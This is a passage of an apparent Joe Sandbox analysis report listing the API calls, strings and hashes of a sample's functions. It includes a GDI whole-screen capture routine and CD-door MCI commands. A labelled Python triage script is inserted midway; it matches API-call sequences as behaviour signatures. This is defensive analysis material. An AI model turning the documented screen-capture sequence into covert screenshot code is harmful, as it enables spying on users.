                                                                                          • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                          • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                          APIs
                                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                          • SendMessageW.USER32 ref: 0046FBAF
                                                                                          • SendMessageW.USER32 ref: 0046FBE2
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                          • SendMessageW.USER32 ref: 0046FD00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                          • String ID:
                                                                                          • API String ID: 2632138820-0
                                                                                          • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                          • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                          • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                          • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                          APIs
                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                          • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CursorLoad
                                                                                          • String ID:
                                                                                          • API String ID: 3238433803-0
                                                                                          • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                          • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                          • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                          • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                          • _wcslen.LIBCMT ref: 00460B00
                                                                                          • __swprintf.LIBCMT ref: 00460B9E
                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                          • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                          • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                          • GetParent.USER32(?), ref: 00460D40
                                                                                          • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                          • String ID: %s%u
                                                                                          • API String ID: 1899580136-679674701
                                                                                          • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                          • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                          • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                          • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                          APIs
                                                                                          • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                          • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                          • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                          • API String ID: 2485709727-934586222
                                                                                          • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                          • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                          • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                          • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                          • String ID: HH
                                                                                          • API String ID: 3381189665-2761332787
                                                                                          • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                          • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                          • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                          • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 00434585
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                          • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                          • String ID: (
                                                                                          • API String ID: 3300687185-3887548279
                                                                                          • Opcode ID: 440148b18d84eb95ba181de3259d53385060cfec68f9b8a73670629712acb2fa
                                                                                          • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                          • Opcode Fuzzy Hash: 440148b18d84eb95ba181de3259d53385060cfec68f9b8a73670629712acb2fa
                                                                                          • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
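Added example, not part of the Joe Sandbox report: a Python script that parses "APIs" listings in the form used on this page (bullet, optional "Part of subcall function", Name.MODULE(args), ref address) and matches ordered API sequences against each function, which is the mechanism behind behaviour signatures like the ones at the top of the report. The GDI chain GetDC(NULL) → CreateCompatibleBitmap → CreateCompatibleDC → SelectObject → StretchBlt(..., 00CC0020) → GetDIBits listed above is a screen capture: a NULL window handle gives the whole-screen DC, 0x00CC0020 is SRCCOPY, and GetDIBits reads the pixels back out. The sample text is constructed from the listing lines of that routine and of the mciSendStringW routine later on the page; the signature names, the SRCCOPY check and the whole-screen check are the example's own, not Joe Sandbox's.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed input: "APIs" listing lines copied from two function blocks of
# the report (the GDI routine around 00434585 and the WINMM routine around
# 0045DA76), with the headers that separate blocks on the page.
SAMPLE = """\
APIs
• GetDC.USER32(00000000), ref: 00434585
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
• CreateCompatibleDC.GDI32(00000000), ref: 0043459B
• SelectObject.GDI32(00000000,?), ref: 004345A9
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
• GetDriveTypeW.KERNEL32 ref: 0045DA30
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
"""

# One listed call: "• [Part of subcall function XXXXXXXX: ]Name.MODULE(args), ref: XXXXXXXX".
# The argument list and its parentheses are absent on some lines
# (e.g. "GetDriveTypeW.KERNEL32 ref: 0045DA30").
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]     # raw hex / "?" tokens exactly as listed
    ref: str                  # address of the call site
    subcall: Optional[str]    # callee address when the call happens in a subroutine


def parse_api_listing(text: str) -> List[List[ApiCall]]:
    """Split the text at each "APIs" header and parse the call lines under it."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        match = CALL_RE.match(line)
        if match is None or current is None:
            continue                      # hash lines, dump sources, empty headers
        raw_args = match["args"] or ""
        args = tuple(a for a in raw_args.split(",") if a)
        current.append(ApiCall(match["name"], match["module"], args,
                               match["ref"].upper(), match["sub"]))
    return blocks


def find_sequence(calls: List[ApiCall], names: Tuple[str, ...]) -> Optional[List[ApiCall]]:
    """Return the calls that realise `names` as an ordered subsequence, else None."""
    matched: List[ApiCall] = []
    position = 0
    for call in calls:
        if call.name == names[position]:
            matched.append(call)
            position += 1
            if position == len(names):
                return matched
    return None


# Example signatures (the example's own names, not Joe Sandbox's): an ordered
# API sequence that a function's direct calls must contain.
SIGNATURES: Dict[str, Tuple[str, ...]] = {
    # screen DC -> compatible bitmap/DC -> blit -> read pixels back: a screenshot
    "gdi_screen_capture": ("GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC",
                           "SelectObject", "StretchBlt", "GetDIBits"),
    "winmm_mci_command": ("mciSendStringW",),
}

SRCCOPY = "00CC0020"   # the dwRop value StretchBlt is called with on the page


def triage(text: str) -> List[dict]:
    """Match every signature against the direct calls of every parsed block."""
    findings = []
    for index, calls in enumerate(parse_api_listing(text)):
        direct = [c for c in calls if c.subcall is None]
        for sig_name, sequence in SIGNATURES.items():
            hit = find_sequence(direct, sequence)
            if hit is None:
                continue
            finding = {"block": index, "signature": sig_name,
                       "refs": [c.ref for c in hit]}
            if sig_name == "gdi_screen_capture":
                get_dc, stretch_blt = hit[0], hit[4]
                # GetDC(NULL) is the whole screen; dwRop is StretchBlt's last argument.
                finding["whole_screen"] = get_dc.args[:1] == ("00000000",)
                finding["srccopy"] = stretch_blt.args[-1:] == (SRCCOPY,)
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Calls reached through "Part of subcall function" are parsed but excluded from matching, so a sequence is only attributed to the function whose own body contains it; a signature that should also see subroutine calls would match on `calls` instead of `direct`.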
                                                                                          APIs
                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                          • __swprintf.LIBCMT ref: 0045E4D9
                                                                                          • _printf.LIBCMT ref: 0045E595
                                                                                          • _printf.LIBCMT ref: 0045E5B7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString_printf$__swprintf_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                          • API String ID: 3590180749-2894483878
                                                                                          • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                          • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                          • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                          • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                          • DeleteObject.GDI32(?), ref: 0046F950
                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                          • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                          • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                          • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                          • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3412594756-0
                                                                                          • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                          • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                          • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                          • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                          APIs
                                                                                            • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                          • API String ID: 4013263488-4113822522
                                                                                          • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                          • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                          • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                          • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                          • String ID:
                                                                                          • API String ID: 228034949-0
                                                                                          • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                          • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                          • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                          • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                          • DeleteObject.GDI32(?), ref: 00433603
                                                                                          • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3969911579-0
                                                                                          • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                          • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                          • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                          • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                          APIs
                                                                                          • GetParent.USER32 ref: 00445A8D
                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                          • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                          • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                          Strings
